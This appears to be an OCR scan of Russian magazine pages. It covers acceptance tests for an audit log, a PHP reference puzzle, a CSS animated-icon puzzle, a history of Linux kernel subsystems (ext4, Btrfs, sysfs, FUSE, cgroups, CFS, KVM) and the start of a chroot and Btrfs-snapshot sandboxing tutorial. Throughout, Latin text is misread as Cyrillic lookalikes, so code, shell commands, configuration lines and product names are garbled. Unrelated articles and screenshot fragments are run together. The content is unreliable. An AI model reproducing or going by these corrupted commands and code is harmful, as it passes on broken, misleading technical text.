МеззадеРогтаІ из стандартной библиотеки по заданному ключу в файле 
ресурсов приложения. 

После реализации журнала работы мы получаем три возможных сцена- 
рия работы кода, на которые, соответственно, должно быть написано три 
приемочных теста. 

Код будет работать исходя из предположения, 
что ошибки записи в журнал аудита фатальны 
для системы, — именно поэтому исключения, 
возникающие в методе аидіі, не обрабатываются 






1 . Тест на обработку корректного документа. Проверяет, что документ со- 
храняется в БД, отсылается подтверждение и появляется соответствую- 
щая запись в журнале работы. 

2. Тест на обработку заведомо некорректного документа, например с пере- 
определенным методом ізѴаІісІ. Проверяет, что результатом обработки 
такого документа является отосланное подтверждение сІоситеп!ІпѵаІісІ 
и запись в журнале. 

3. Тест на обработку ошибок, например с перегруженным методом 
сІоситепгЗегѵісе.з^оге, генерирующим исключение ЗегѵісеЕхсер^іоп. 
Проверяет, что в такой ситуации единственным результатом работы яв- 
ляется запись в журнале. 



Поскольку журнал работы сохраняется в базе данных, метод аисііі дол- 
жен выполняться в отдельной транзакции — иначе результаты его работы 
могут не сохраниться из-за отката основной бизнес-транзакции, если ме- 
тод аисііі вызывался внутри нее. 

ЗАДАЧА ОТ КОМПАНИИ $ОГШМЕ№ 1 

Что выведет данный скрипт? Объясните почему. 

<?д(ір 

■Рипсііоп -Рп(&$ѵаг) 

{ ' 

$ѵаг = $ѵаг - ($ѵаг/10 

геіигп $ѵаг; 

} 

есМо -Рп(100); 

? > 

РЕШЕНИЕ 

Перед тем как начать пересчитывать предполагаемый результат функции 
для параметра 100, проверим корректность реализации и вызова. 



ЧИТАТЕЛЬ! 
ПРИСЫЛАЙ 
НАМ СВОИ 
РЕШЕНИЯ, И МЫ 
ИХ ОПУБЛИКУЕМ! 

РУКОПИСИ 
ВОЗВРАЩАЮТСЯ 
В ПОМЯТОМ 
И ИСПОРЧЕННОМ 
ВИДЕ, ПОЭТОМУ 
ЛУЧШЕ ПОЛЬЗУЙСЯ 
ЭЛЕКТРОННОЙ 

почтой. 



РНР Ра-Ьаі еггог: Опіу ѵагіаЬІез сап Ье 
ра55ед Ьу ге-Регепсе 

ЗАДАЧА ОТ КО М ПАН И И 80 РТЫ N Е № 2 

Как можно сделать анимированную иконку сред- 
ствами только СЗЗ с анимацией части изображе- 
ния, без использования растрового фона? 

РЕШЕНИЕ 

Используется базовый класс с описанием па- 
раметров основного блока — каркаса кружки, 
два класса с модификаторами :айег и :ЬеТоге 
для создания уровня жидкости и ручки, а также 
класс :Ііоѵег для отображения состояния при на- 
ведении курсора. В базовом классе указаны па- 
раметры анимации — анимируемое свойство, 
скорость анимации и тип анимации: 

.ти§_апіта1:е { 

-меЬкі1:-Ьох-5ІіасІо\л/: іп5е:Ь 0 -Зет 0 0 4-« 

#2С2С2С; 

Ьох-зИасІоіл/: іпБе-Ь 0 -Зет 0 0 

_ #2С2С2С; 

тар§іп: 0 ац-Ьо; 

таг&іп - ЬоІіМт; Іет ; 

Ііеі§Ы: : 2,5ет; 

таг§іп-1:ор: 1.25ет; 

ро5і1:іоп: ге1а1:іѵе; 

мідШ:. 1.5ет; 



-меЬкіІі-ІігапзіІііоп: а11 1000т5 

1іпеаг^ 

-то2-1:гап5І1:іоп: а11 1000т5 Ііпеаг; 
-о-1:гап5і1:іоп а11 1000т5 Ііпеаг; 
-тз-іігапзіііоп: а11 1000т5 Ііпеаг; 
ігапзіііоп: а11 1000т5 Ііпеаг; 



.тие^апітаіеіа-Ріег { 

Ьогдег: .25ет 50ІІСІ #2С2С2С; 

ЬогсІег-гі^ІтІ:: попе; 

Ьогдег-гадіиз: .75ет 0 0 .75ет; 
сопііепі : ' ' ; 

Иеі§т: 1.5ет; 

Іе-РІ:: "Іет; 

РР 5 ІІІОП: аЬзоІиіе; 

Іор: .25ет; 

ѵу»ісіі:іі: .75ет; 



, тиб_а п ітаі:е : Ье-ро ге { 

ЬогсІег-гасІіиБ: 0 0 0.2ет 0.2ет; 

і:ор: -0,5ет; 

Іе-РІ:: -0,25ет; 
роБі-Ьіоп: аЬ$о1и-1:е; 

Ьогсіег: 0.25ет 5р1іс1 #2С2С2С; 
Иеіёіі-І:: 2, 5ет; _ 

мід-ІіМ : Д , 5ет; . 

соп-іеп-і: __ 

} " 



. ти§__апіта-1:е : Иоуер { 

-меЬкі-1:-Ьох-5Ііадо»л/: іпзе-І: 0 0ет 0 ♦-! 
0 #2С2С2С; 



} 



Ьох-5ІіасІо\л/: іпзе-І: 0 0ет 0 0 #2С2С2С; 
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Когда-то Линус Торвальдс 
назвал ядро Ыпих резуль- 
татом эволюции, а не инже- 
нерии и проектирования, 
объяснив таким образом се- 
рьезную запутанность кода 
и мешанину из применяемых 
технологий. Тем не менее 
Ыпих держится на нескольких 
ключевых механизмах и под- 
системах, которые как раз 
и делают его уникальным. 

Эта статья — экскурс в исто- 
рию таких подсистем, анализ 
причин их появления и их 
значения в успехе Ыпих. 
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ЕХТ2,ЕХТЗ,ЕХТ4 

В первых версиях ядра Ыпих использовалась 16-битная файло- 
вая система Міпіх, разработанная Эндрю Таненбаумом как про- 
стой и наглядный пример ФС для студентов. Ее максимальный 
размер составлял 64 Мб, а длина имени файла не могла пре- 
вышать 14 символов. Вскоре для ее замены была разработана 
файловая система ехі (ехіепсіесі — расширенная), которая под- 
няла ограничение на размер ФС до 2 Гб, а длину имен файлов — 
до 255 символов. Фактически ехі была всего лишь продвинутым 
вариантом ФС Міпіх, в которой отсутствовала даже такая про- 
стая вещь, как поддержка дат модификации файлов, поэтому 
она долго не прожила и была заменена на ех^2. 

Новая ФС была создана с нуля на основе идей оригиналь- 
ной 1)Р5 из иміХ и унаследовала почти все преимущества по- 
следней. Общий размер файловой системы мог составлять 4 Тб 
с возможностью выбора размера блока для подгонки произво- 
дительности под определенные задачи. Благодаря продуман- 
ному дизайну, ех12 можно было с легкостью усовершенствовать, 
и вскоре для нее появились реализации АСЕ и расширенных 
атрибутов файлов. На последнем этапе разработки драйвер 
ех^2 оптимизировали, и она стала самой быстрой файловой си- 
стемой среди открытых никсов. 

Ехі2 получилась настолько удачной, что долгое время о ее 
замене и не задумывались. Единственным ограничением было 
отсутствие журналирования, что благополучно исправила ком- 
пания РеР НаЕ создав ех!3, доработанный вариант ехі2, — но- 
вого в нем было только наличие журнала, а также твики произ- 
водительности и небольшие доработки. Во всем остальном е>РЗ 
оставалась ехі2, и ее можно было подключить с помощью драй- 
вера последней (потеряв журналирование) или преобразовать 
ехХ2 в ехіЗ, просто задействовав журнал с помощью утилиты 
Шпе2^з. 

С развитием файловых систем стало ясно, что технологии 
ехіЗ уже не могут обеспечить достаточную производительность 
и функциональность в сравнении с конкурентами, и началась 
разработка ех14. Задачи сохранения обратной совместимости 
на этот раз не стояло, поэтому разработчики смогли развер- 
нуться по полной, применив при разработке ФС самые передо- 
вые техники оптимизации. 

Наиболее значительным усовершенствованием ФС стала 
идея так называемых экстентов. Они используются для пред- 
ставления непрерывных участков блоков файловой системы, 
закрепленных за файлом. В ехІЗ с этой целью использовалась 
классическая идея карт соответствия, то есть списков блоков, 
по которому драйверу ФС нужно было проходить каждый раз 
при чтении и записи файлов, что снижало производительность. 
Экстенты позволяют адресовать непрерывные последователь- 
ности блоков, а потому вместо карты соответствия файла из ты- 
сяч записей ехМ может использовать всего несколько экстен- 
тов, что существенно поднимает производительность ФС. 



Таким же образом хранится информация о свободных бло- 
ках ФС. Вместо таблиц адресов блоков теперь применяются те 
же экстенты, что увеличивает скорость распределения блоков 
при создании или модификации файлов. Сам механизм выде- 
ления блоков был переработан. Теперь операция выделения 
происходит не сразу при создании файла, а откладывается 
вплоть до момента сброса его содержимого на диск. Как ре- 
зультат, процесс создания и модификации файлов теперь про- 
исходит очень быстро. 

Кроме того, было добавлено и большое количество других 
оптимизаций и улучшений, таких как 48-битная адресация, по- 
зволившая расширить размер ФС до одного эксбибайта, раз- 
мещение расширенных атрибутов прямо в іпосіе для увеличения 
скорости доступа к ним, резервирование іпосіе для возможных 
файлов при создании каталога, технология предварительно- 
го распределения блоков для файлов для таких приложений, 
как торрент-клиенты, контрольные суммы журнала и многое 
другое. Особо стоит отметить поддержку онлайн -дефрагмента- 
ции файловой системы, которая позволяет сохранить высокую 
производительность, не отключая ФС и не производя дефраг- 
ментацию вручную. 

Предварительная версия ех14 появилась в ядре Ыпих 2.6.19, 
допиливание файловой системы продолжалось больше года, 
и с выходом ядра версии 2.6.28 ех14 стала стабильной и реко- 
мендованной для повсеместного тестирования. Сегодня ех14 — 
это стандарт в мире Ііпих и наиболее производительная журна- 
лируемая файловая система. 




В(г^8вядре Упих 



В отличие от карты 
соответствия, экс- 
тенты адресуют сразу ВТНР8 

несколько блоков Как бы хороша ни была ехЫ, ее узкие места отлично понимают 

и прямо говорят, что она лишь переходный этап к файловым си- 



Оаіа Ыоск 




стемам будущего, которые будут иметь концептуально иной ди- 
зайн и возможности. Наиболее близкий кандидат в такие ФС — 
это ВІГІ5, разрабатываемая под руководством компании Огасіе 
в качестве альтернативы 2!Р8 (разработка была начата еще 
до приобретения компании Зип, владеющей правами на 2Р5). 

Три основные фичи этой ОС — отличная масштабируемость, 
плотная интеграция с менеджером томов и расширяемость. 
Как и ех14, ВІіТз базируется на идее экстентов, которая позволя- 
ет сделать управление данными эффективным даже для очень 
больших объемов данных и размеров файлов. Выделение іпосіе 
в файловой системе происходит в полностью динамическом 
режиме, что снимает ограничение на общий объем файлов. 
Мелкие файлы размещаются прямо в іпосіе, так же как это сде- 
лано в Реі2ег4, поэтому производительность работы ФС с боль- 
шим количеством небольших файлов остается очень высокой. 

Как и в 2Р8, размещение файлов производится по принципу 
сору-оп-\л/гі1е (СОѴѴ), а это означает, что файл никогда не пере- 
записывается, вместо этого при его модификации происходит 
выделение новых блоков данных для хранения измененных 
частей. Такой подход позволяет сделать процесс модифика- 
ции файлов более эффективным, идеально подходит для 880- 
накопителей с их ограниченным количеством циклов перезапи- 
си, а также делает возможной такую технологию, как снапшоты, 
когда пользователь в любой момент может откатиться к преды- 
дущей версии файловой системы или отдельных файлов. 
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Роѵѵегей Ву РЬогопіх Техі ЗиЛе 4.2.0пі2 



1. (СС) дсс ор«іоп5: -03 



Для гарантии целостности файловая система использует 
хеши данных и метаданных. Файловая система может иметь 
несколько корней (подтомов), благодаря чему одну файловую 
систему можно использовать для размещения нескольких вир- 
туальных окружений или сэндбоксов. Уже реализован меха- 
низм прозрачной компрессии данных с помощью алгоритмов 
І 20 и 2 ІіЬ, который позволяет сэкономить дисковое простран- 
ство и при этом поднять производительность ФС (распаковка 
данных происходит быстрее их чтения с диска). Реализована 
система онлайн-дефрагментации, а также динамического рас- 
ширения и сжатия ФС по необходимости. 

Чтобы сделать работу файловой системы поверх ВАЮ- 
массивов более эффективной и повысить надежность, разра- 
ботчики тесно интегрировали Віііз с подсистемой управления 
томами Оеѵісе Маррег. Такой дизайн позволяет консолидировать 
работу файловой системы и подсистемы РАЮ, в результате чего 
возрастает как производительность, так и надежность массива. 
Файловая система знает об используемой РАЮ-схеме, текущем 
состоянии дисков и балансирует нагрузку в зависимости от ус- 
ловий (например, наиболее используемые файлы будут автома- 
тически перемещены на более производительный диск). Сбой 
в работе РАЮ-массива позволяет вовремя остановить операции 
ввода- вывода и восстановить свою работу, дождавшись пере- 
конфигурирования. В совокупности с контрольными суммами, 
которые файловая система хранит для каждого блока, РАЮ- 
массив на основе Вігіз становится крайне надежным. 

На текущий момент Вігіз уже достаточно стабильна для по- 
вседневного применения и в некоторых тестах производитель- 
ности обгоняет ехЫ. Она использовалась в качестве основной 
ФС в мобильной платформе МееСо и доступна для использова- 
ния по умолчанию во многих дистрибутивах. 

8Ѵ8Р8 

Работая над ядром экспериментальной ветки 2.5.Х и реализуя 
новую подсистему управления драйверами устройств, разра- 
ботчики решили оснастить ядро новым интерфейсом отладки, 
реализованным в виде виртуальной файловой системы. Ин- 



Согласно синтетиче- 
ским тестам, ехТ4 оста- 
ется самой производи- 
тельной ФС в Ыпих 



ДАТЫ ВЫХОДА 
ФАЙЛОВЫХ 
СИСТЕМ 

1987 

МіпіхР8(0.01) 

1992 

ехі (0.96с) 

1993 

ех12 (0.99.15) 

2001 

ВеізегРЗ (2.4.1) 

2001 

ехіЗ (2.4.15) 

2006 

0x14(2.6.28,2.6.19) 

2009 

ВІГІ5 (2.6.29) 

В скобках указано первое 
появление ФС в ядре 
Ііпих. 



терфейс был назван сісііз (Оеѵісе Огіѵег Рііезузіет) и позволял 
получать различную информацию об устройствах, состоянии 
драйверов и другие низкоуровневые данные. 

К моменту релиза ядра 2.6 оказалось, что сісііз может 
быть полезна и для многих других приложений, работающих 
с железом, поэтому ФС было решено переименовать в зузіз 
(Зузіет Рііезузіет) и включить в будущий релиз. Это событие 
повлекло за собой целый ряд изменений в подходе к постро- 
ению окружения Ыпих. Вся «железная» информация теперь 
хранилась централизованно и всегда в актуальном состоянии, 
что позволило проектам вроде КОЕ и СВМОМЕ реализовать 
действительно умное управление оборудованием. Интерфей- 
сы управления железом также начали перекочевывать в зузіз, 
разгружая и без того запутанную ргосіз. И наконец, зузіз позво- 
лила выпилить из ядра файловую систему сіеѵіз, отвечающую 
за динамическое создание файлов-устройств, и заменить ее 
на легковесный и гибкий в управлении демон исіеѵ, полностью 
руководствующийся информацией из зузіз. 

Сегодня ядро Ііпих без зузіз представить невозможно. Фай- 
ловая система используется огромным количеством утилит, 
демонов и систем умного управления энергосбережением. 
Она занимает центральное место в подсистеме управления 
оборудованием АпРгоісІ и других мобильных систем, основан- 
ных на ядре Ыпих. С помощью зузіз можно разгонять процес- 
сор, управлять яркостью дисплея, настройками жестких дисков 
и планировщиков. 

РЦ8Е 

С самого момента своего появления ядро Ыпих критиковалось 
за монолитный дизайн, снижающий надежность ОС, затрудня- 
ющий разработку и тестирование драйверов и не обладающий 
достаточной гибкостью. Линус Торвальдс никогда не воспри- 
нимал всерьез подобную критику, однако добавил-таки в ядро 
версии 2.6.14 интерфейс РУЗЕ, позволяющий выносить файло- 
вые системы из ядра, реализуя их в виде обычных приложений. 

РУЗЕ представляет собой небольшой модуль ядра, по- 
средством обращения к которому (через сокет) любое прило- 
жение может реализовать собственную файловую систему или 
файловый интерфейс к любым другим сущностям. С помощью 
РУЗЕ были созданы приложения, позволяющие подключать 
в виде файловых систем Іаг-архивы, РТР-, ЗМВ- и ѴѴеЬОАѴ- 
ресурсы, специальные шифрующие файловые системы и мно- 
гое, многое другое. 

Наиболее известный представитель ФС на основе РУЗЕ — 
драйвер МТРЗ-30, позволяющий подключать МТРЗ на чтение 
и запись, но реализованный полностью в пространстве поль- 
зователя. С помощью РУЗЕ также разработаны многие серьез- 
ные файловые системы, такие как, например, кластерная фай- 
ловая система ОІизІегРЗ, используемая в крупных компаниях 
для хранения данных в облаке, а также многие другие, ссылки 
на которые можно найти на официальном сайте РУЗЕ ( ооо.оі/ 
ІгѵѵВЗ ). 

РУЗЕ часто используется для прототипирования и отлад- 
ки файловых систем, планируемых к реализации внутри ядра, 
а создать свою ФС с ее помощью настолько просто, что это 
можно сделать за полчаса, не обладая никакими специальными 
знаниями. 

ССНОУ Р8 И П РОСТРАНСТВА ИМЕН 

Как и в любой другой УМІХ-подобной операционной системе, 
в Ыпих всегда существовало несколько механизмов контроля 
процессов и их ресурсов. Это значения приоритета (пісе) и ли- 
митирование ресурсов с помощью системного/библиотечного 
вызова иіігліі. Эти интерфейсы не могли предоставить возмож- 
ности гибкого управления ресурсами, поэтому компания Соодіе 
приступила к разработке технологии, изначально получившей 
имя ргосезз сопіаіпегз, а затем переименованной в Сдгоирз 
(Сопігоі Огоирз). 

Сдгоирз — это официально включенный в ядро 2.6.24 
фреймворк группировки процессов и управления их ресурса- 
ми, такими как количество оперативной памяти, процессорные 
ресурсы, приоритеты ввода- вывода и доступа к сети. Техноло- 
гия Сдгоирз тесно связана с системой управления простран- 
ствами имен, которая позволяет поместить выбранную группу 
процессов в независимое от основной системы окружение, 
которое может иметь собственный корень файловой системы. 
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собственный список процессов, сетевой стек и систему меж- 
процессного взаимодействия. 

В сочетании эти две технологии позволяют создать полно- 
стью виртуализированное окружение для группы процессов, 
чем с успехом пользуются системы виртуализации ОрепѴІ 
и 1_ХС для запуска «Ііпих внутри Ыпих». Также с помощью Сдгоирз 
можно легко выполнить довольно сложные задачи, вроде огра- 
ничения всех малозначимых фоновых демонов в процессоре, 
безопасный запуск подозрительных приложений, многополь- 
зовательское окружение с полным отделением юзеров друг 
от друга (как сделано в ІІЬипІи Тоисіі), назначение всем интерак- 
тивным процессам более высокого приоритета (такой подход 
применяется в текущих версиях Ыпих) и многое другое. 

СР5 

За все время существования Упих сменил множество различ- 
ных алгоритмов планирования процессов, от самых простых 
и примитивных до алгоритмов, способных предугадывать бу- 
дущие потребности процессов в ресурсах процессора и равно- 
мерно распределять время между всеми процессами. Однако 
наиболее значимым стал переход к использованию планиров- 
щика СР5, который позволил вплотную приблизить работу си- 
стемы к идеалу. 

СР5 (Сотріеіеіу Раіг ЗсИесІиІег) был разработан Инго Мол- 
наром под впечатлением от планировщика Роіаііпд Зіаігсазе 
□еасіііпе за авторством непризнанного Ыпих-хакера Кона Коли- 
васа, известного своим нестандартным подходом к реализации 
внутриядерных механизмов. СРЗ отличается простотой, отсут- 
ствием какой-либо эвристики и удивительной способностью 
к правильной балансировке нагрузки. В системе с СРЗ можно 
запросто запустить компиляцию в несколько потоков, форк- 
бомбу, фильм и при этом спокойно сидеть в интернете, практи- 
чески не замечая каких-либо притормаживаний. Нагрузка будет 
распределена полностью равномерно. 

Достигается это за счет простого алгоритма распределения 
времени, в котором процессы встают в очередь в том порядке, 
в котором они использовали время процессора в предыдущий 
раз. Наименее жадные получают процессор первыми, наи- 
более жадные — последними. Поэтому, например, компиля- 
тор и форк-бомба будут находиться ближе к концу в очереди, 
а интерактивные процессы, которые большую часть времени 
простаивают, ожидая ввода пользователя или данных с дис- 
ка, — к началу, что является разумным, но полностью автомати- 
зированным разделением времени. 

СРЗ был включен в ядро, начиная с версии 2.6.23, и, веро- 
ятнее всего, еще не скоро покинет его (если это вообще слу- 
чится). Разработчики РгееВЗО портировали его в свою систему, 
но, к сожалению, забросили разработку в пользу собственного 
планировщика ІІІЕ. 



КѴМ — это драйвер для подсистем Іпіеі ѴТ 
ц АМВ 5ѴМ, в отличие от Хеп не затраги- 
вающий базовых структур ядра 



г- 



Файл Правка Вид Помощь 



Новая 



т і> 00 (|з 

Открыть Запустить Приостановить Выключить 



1оса1Ьо5( (ОЕМУ) 



ІОІ 

ІШІ 



ІО] 



ѵт2 

Работает 



ѵтЗ 

Работает 



ѵт4 

Работает 



ѵт5 

Выключена 



Управление вир- 
туальными КѴМ- 
окружениями с помо- 
щью ѵіг(- тападег 



Принцип работы РУЗЕ 




Использование СРУ 




КѴМ 

к началу бума виртуализации в мире Ыпих уже существовал ин- 
струмент, позволяющий превратить пингвина в полноценную 
платформу для запуска виртуальных машин. Это Хеп, который 
появился еще до начала продаж процессоров с поддержкой ап- 
паратной виртуализации и позволял запускать (модифициро- 
ванные) гостевые окружения на скорости, близкой к нативной. 
Однако с появлением технологий аппаратной виртуализации 
ІпІеІ ѴТ и АМО ЗѴМ стало ясно, что Хеп, будучи оправданным ре- 
шением в мире паравиртуализации, в новых условиях оказыва- 
ется решением избыточным, требуя использовать специальное 
ядро и инструменты даже в том случае, если предполагается 
аппаратная виртуализация. 

Решением проблемы стал КѴМ (КегпеІ-ЬазесІ Ѵігіиаі 
Масіііпе), небольшой модуль Ыпих-ядра, позволяющий полу- 
чить все возможности аппаратной виртуализации без необ- 
ходимости наложения патчей, установки специального ядра 
и тому подобных извращений. Достаточно загрузить модуль, 
установить специальную версию эмулятора ОЕМІ) — и можно 
начинать запуск виртуальных окружений, работающих со ско- 
ростью 99% от нативных. 

Козырь КѴМ в предельной простоте. Это всего лишь не- 
большой драйвер для подсистем ІпІеІ ѴТ и АМО ЗѴМ, который, 
в отличие от того же Хеп, не затрагивает никаких базовых струк- 
тур ядра и не требует использования специальных драйверов 
в виртуальных окружениях. Вся сложная работа выполняется 
в пространстве пользователя силами того самого ОЕМІ), тогда 
как КѴМ играет роль интерфейса для настройки адресного про- 
странства гостя виртуальной машины. 

По этой причине код КѴМ был очень быстро принят в ядро 
Ыпих 2.6.20, а компания Оитгапеі, ответственная за его раз- 
работку, куплена ПесІ ИаХ. Сегодня КѴМ — это стандарт в мире 
□пих-виртуализации. Он используется во многих облачных 
платформах и фреймворках. В виртуальных окружениях, соз- 
данных КѴМ, работают миллионы серверов. Он является базо- 
вой частью всех облачных решений таких компаний, как Веб Наі, 
ІІЬипІи, ЗиЗЕ и многих других. 

ВЫВОДЫ 

Ыпих развивается стремительными темпами, серьезно обнов- 
ляясь до шести-семи раз в год. Однако по-настоящему фунда- 
ментальные технологии появляются в нем не так часто. В статье 
мы рассмотрели наиболее важные из этих технологий, что со- 
всем не значит, будто на этом их список заканчивается. За бо- 
лее чем 20 лет существования ядра в Ыпих появилось и исчезло 
огромное количество технологий, для описания которых при- 
шлось бы расширить статью до полноценной книги. ^ 
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ПОДУШКА О 

БЕЗОПАСНОСТИ 




СОЗДАЕМ ОТКАЗОУСТОЙЧИВУЮ 
СРЕДУ ДЛЯ ЭКСПЕРИМЕНТОВ 
НА ОСНОВЕ овимти 12.10 



Никто из нас не застрахован от ошибок. Ино- 
гда синдром кривых рук приводит к весьма 
печальным последствиям. Иногда очень 
сложно удержаться и не провести «антинауч- 
ные» эксперименты с системой или запустить 
скрипт/приложение, скачанное из непро- 
веренного источника. И здесь на помощь 
приходят различные средства для запуска 
приложений в изолированной среде и расши- 
ренные возможности файловой системы. 



ВВЕДЕНИЕ 

*піх-системы всегда были относительно устойчивы к некоррек- 
тно написанным приложениям (в том случае, конечно, если они 
запускались не из-под суперпользователя). Однако иногда воз- 
никает желание поэкспериментировать с системой — порез- 
виться с конфигами, отдельные из которых могут быть жизненно 
важными, запустить подозрительный скрипт, поставить про- 
грамму, полученную из недоверенного источника... А то и про- 
сто одолевает паранойя, и хочется возвести как можно боль- 
ше барьеров для защиты от потенциальной малвари. В статье 
будут описаны некоторые средства, позволяющие избежать 
последствий невынужденных ошибок с помощью отката на за- 
благовременно созданную точку возврата (снапшоты Віііз), за- 
пустить подозрительную программу в ограниченном окружении 
и потешить твою паранойю (Агкозе и сбгоо!). 

снноот 

СІігоо^ известен давным-давно. У него имеется огромное пре- 
имущество перед другими средствами — он работает везде, 
даже на очень старых дистрибутивах. Все эти новомодные пе- 
сочницы представляют собой не что иное, как его дальнейшее 
развитие. Но есть и минусы. Например, нет возможности огра- 
ничить работу с сетью, гоо^ может при некотором усилии выйти 
из него, и самое главное — его достаточно сложно настраивать. 
Несмотря на это, для некоторых целей, к примеру установки 
пакетов из исходников, он подходит идеально. Существует 
как минимум три способа создания сіігооі-окружения; 




ХАКЕР 04/171/2013 



Подушка безопасности 



^9 



5Вайл Орзвка вид Журнал Закладки Имструмеиш Справка 
|ОцЬити5іаггРа^ X |Щйооігів ; 



1,Л1п]е« в спускаемый процесс.... х |'|у новости -> дпіхіотт оц 



АгсН Цпих мачап оакіитик 



:е СУБД >^.501 на 



(МХР1 500*1 - /№глдр«(ш» т 



ІМХР1 .Ооеп ьоигсе. 123 - 



ь аисплеев на Рас ОМс 



еииого иіданмк 






# 



I Оліііпі форума '' I 



Лросяетраа Пвсявдиеа соовтоиае 



2Ы5еі*етЬнгог2-»гг 22 



2віЛ1апи*гг013.і2>53 
Поел іообшаняе ОѴ№вТѴ< 

25(ПіапіМгу20и-і(И4в 
Поел сообшктме ЫпСІаш 

гЭкОаіКіѴѵ 2013- (182» 
Поел еообшеяяо ОшКгѵ » 

гѵвіапиаіу 2013 1 17 23 



1 . Все необходимые для работы запускаемой программы при- Огнелис в песочни- 

ложения и библиотеки ты определяешь сам. Это наиболее це — об этом говорит 
гибкий способ, но и наиболее замороченный. заголовок 

2. СІігооІ-окружение формируется динамически. Одно время 
существовал проект Ізоіа^е, который это и делал, но нынче 
по неизвестным причинам он канул в Лету. 

3. Развертывание базовой системы в указанном каталоге 
и чрутинг на него — его я и опишу. 

Для начала установим пакет беЬооІзІгар, который использу- 
ется как раз с этой целью. 



$ зисіо ар1:-бе1; іпзііаіі сІеЬоо1:5І:гар 

Затем создадим каталог, в котором будет находиться сИгооІ, 
и развернем базовую систему диапіаі в нем. В общем-то, его 
можно создать где угодно, но традиционное место его разме- 
щения — /ѵаг/сіігооі. Поскольку большинство следующих ко- 
манд требуют права гооі, имеет смысл переключиться на акка- 
унт суперпользователя: 

$ зисіо зи - 

# шксііг /уаг/сЬгоо!: && ссі /ѵаг/сЬгооІ: 

# сІеЬоо-Ьз-Ьгар циапііаі ./диап1:а1-сііг1 4 -^ 

Ы:1;р : //шіггог . уапсіех . ги/иЬип-Ьи 

Разберем последнюю команду. Она разворачивает релиз 
убунты Оиапіаі в отдельный каталог диап1аі-сііг1 (мало ли, вдруг 
понадобится еще один еНгооІ) с ближайшего зеркала. После 
завершения развертывания необходимо отобразить файло- 
вые системы ргосГз, зуз^з и (если это необходимо) каталог /беѵ 
на данное поддерево. В случае если сіігооі будет использовать- 
ся для текстовых приложений только до перезагрузки, должно 
хватить следующих команд: 




ШРО 

Команды ВІГІ5 имеют 
стандартный и сокра- 
щенный вид. Например, 
команду «ЫгІ8 зиЬѵоІите 
зпарзіюі» можно запи- 
сать как«ЫгІ8$и8п>». 



Сравнение скорости 
компиляции на ехЫ 
и на ВІГІ8 





срив И ВТРРЗ 

Скорее всего, при загрузке с раздела Вігіз СгиЬ будет 
ругаться, что-де разреженные файлы недопустимы, 
и просить нажать любую клавишу. Чтобы это сообще- 
ние не выскакивало, открой в любимом текстовом 
редакторе файл /еІс/дгиЬ.с1/00.ІіеасІег и закомменти- 
руй там следующую строчку: 

І'Р [ _-п ЛЛ${Ііаѵе__§гиЬепѵ}" ]; -Ііііеп і-Р [ -г 
"\${Ьоо-Ь_опсе}" ]; -ЬНеп заѵе епѵ гесогсІ-РаіІ 4-* 
Я; Я 

Собственно, переменная гесогсІРаіІ необходима, 
чтобы предотвратить циклическую перезагрузку, 
для чего она при старте взводится, а затем, в случае 
успешной загрузки, устанавливается в 0. Хоть ком- 
ментировать код, отвечающий за эту процедуру, и 
нежелательно, но думаю, что на настольной системе 
вполне можно обойтись и без него. 



# тоипі; --ЬіпсІ /ргос /уаг/сЯгоо1:/диап1;а1-сЯг1/ргос 

# тоипі: --ЬІПСІ /вуз /ѵаг/сЬгооі/диапіаІ-сИгІ/зуз 

# тоип-Ь --ЬіпсІ /сіеу /ѵаг/сЬгоо1:/диап1:а1-сЬг1/сІеѵ 

Если же требуется, чтобы данное поддерево работало и по- 
сле перезагрузки, добавь соответствующие строки в /еІсДзІаЬ. 
Ну а для работы некоторых графических приложений также 
следует отобразить каталоги Дтр и /ѵаг/гип/сІЬиз. После этого 
уже можно вводить следующую команду, которая, собственно, 
и делает сЬгооІ: 

# сЬгооІ: /ѵаг/сЬгооі:/диап1:а1-сЬг1/ 

И ты уже заперт в нем. Для того чтобы не спутать сЬгооІ с ре- 
альной системой, рекомендую изменить приглашение оболоч- 
ки. Для примера давай установим и запустим в сЬгооІ Зкуре. 
Для этого потребуется установить на хостовой системе па- 
кет зсЬгооІ, который позволяет упростить запуск программ 
в сЬгооІ-окружении: 

# арі-^еі: іпзіаіі зсЬгооІ: 

Затем добавим запись в файл /еІс/зсЬгооІ/зсЬгооІ.сопІ. 
В моем случае я добавил следующую: 

/еІс/зсЬгоо-Ь/зсЯгооІ.соп-Р 

[диап1:а1-5куре] 

сIе5сгір1:іоп=^иап1:а1 Бкуре 

сІігес1:огу=/уаг/ с Ь гооі:/ ди а пі а 1 - с Ь г 1 
ргіогі1:у=3 

изег5=гот 

5Гоир5=гот 

гоо1:-§гоир$=гоо1:,гот 

Пробрасываем /беѵ, /ргос, /зуз, Дтр и /ѵаг/гип/сІЬиз — 
как это сделать, смотри выше. Добавим в сЬгооІ пользователя 
и группу зкуре — при этом желательно, чтобы иісі и діеі совпада- 
ли с иісі/дісі основного пользователя реальной системы (в моем 
случае — гот), для чего набираем следующие команды: 
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фАф гоо1^иЬипКи:/тпІ/$(1аі1 

гоо<:®иЬип^и:~# пкЛг /ппі/5<іаіі 
гоо1:®иЬип^и:~» поип^ /<1еѵ/5<1а11 /пп1:/5(1а11 
гоо^@иЬип^и:-# с<1 /пп1/5<1аі1/ 
гоо10иЬип1:и: /пп(/5ба11# 
гоо1§иЬип1и:/гпп^/5да1і# І5 ^зпарзНо^з/ 

?01 302011431 201302011434 

гоо1:§иЬип1и:/пп^/5<1аіі# пѵ @ §_Ьа<1гоо1 

гоо1;0иЬип1и:/пп1/5(іа11» пѵ §5пар5ЬоІ5/2Ѳ13Ѳ2Ѳ11434/гооІ5пар 0 
гоо1§иЬип1и:/пп^/5(1а11# 



# 5сИгоо1: -С яиап1:а1-5куре -и гооі: 

# асісібгоир --еісі 100® зкуре 

# асісіизег --сІІ5аЫесІ-ра55\л;огсІ ---Рогсе --иісі 1000 
--§іс1 1000 зкуре 

После этого ставим свежескачанный Зкуре — опять же 
в СІ 1 ГООІ — и удовлетворяем его зависимости; 

# сІрк§ ---Рогсе-аіі -і 4-^ 
зкуре-иЬип1:и-ргесі5е_4. 1.0. 20-1_і386.сІеЬ 

# ар-р-бе-р -•? іпз-раіі 

# ехіі: 

В основной системе разрешаем соединения с Х-сервером 
с ІосаІІіозІ и заходим в сРігооІ как обычный пользователь: 



Откат на снапшот ВМв 




'тт 

^1пр8://Ы^^З■ѵѵікі, 
кегпеі.огд 
-ѵѵікі по ВШз. 



$ хІіоз'Ь +1оса1Ііо5І: 

$ ССІ / && зсМгооІ: -с Яиап1:а1-5куре -и гот /Ьіп/Ьазіі 

